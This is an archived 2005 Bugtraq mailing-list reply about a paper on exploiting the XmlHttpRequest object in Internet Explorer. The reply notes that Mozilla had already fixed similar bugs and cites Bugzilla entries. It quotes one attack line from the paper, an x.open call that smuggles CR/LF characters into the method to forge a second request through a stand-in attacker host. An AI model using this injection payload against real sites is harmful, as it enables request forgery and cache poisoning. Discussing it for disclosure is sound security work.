[40479] in bugtraq

home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: "Exploiting the XmlHttpRequest object in IE" - paper by Amit

daemon@ATHENA.MIT.EDU (Yutaka OIWA)
Tue Sep 27 14:24:54 2005

To: bugtraq@securityfocus.com
From: Yutaka OIWA <y.oiwa@aist.go.jp>
Date: Tue, 27 Sep 2005 21:34:11 +0900
In-Reply-To: <4335AE06.15602.117FB481@localhost> (Amit Klein's message of
 "Sat, 24 Sep 2005 19:50:30 +0200")
Message-ID: <87wtl21ygs.fsf@bluewind.rcis.aist.go.jp>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii

Hello Amit,

"Amit Klein (AKsecurity)" <aksecurity@hotpop.com> writes:

>   x.open("GET\thttp://www.target.site/page.cgi?parameters\tHTTP
>   /1.0\r\nHost:\twww.target.site\r\nReferer:\thttp://www.target
>   .site/somepath?somequery\r\n\r\nGET\thttp://nosuchhost/\tHTTP
>   /1.0\r\nFoobar:","http://www.attacker.site/",false);

This kind of bugs are already fixed in recent Mozilla browsers,
as shown in your reference [4].

> [4] "setRequestHeader can be exploited using newline characters", 
> Bugzilla bug 297078
> https://bugzilla.mozilla.org/show_bug.cgi?id=297078 and 
> "XMLHttpRequest allows dangerous request headers to be set", 
> Bugzilla bug 302263
> https://bugzilla.mozilla.org/show_bug.cgi?id=302263

see comment #15 of bug 297078.

https://bugzilla.mozilla.org/show_bug.cgi?id=297078#c15

-- 
Yutaka OIWA                        Research Center for Information Security
    National Institute of Advanced Industrial Science and Technology (AIST)
                      Mail addresses: <y.oiwa@aist.go.jp>, <yutaka@oiwa.jp>
OpenPGP: id[995DD3E1] fp[3C21 17D0 D953 77D3 02D7 4FEC 4754 40C1 995D D3E1]

home	help	back	first	fref	pref	prev	next	nref	lref	last	post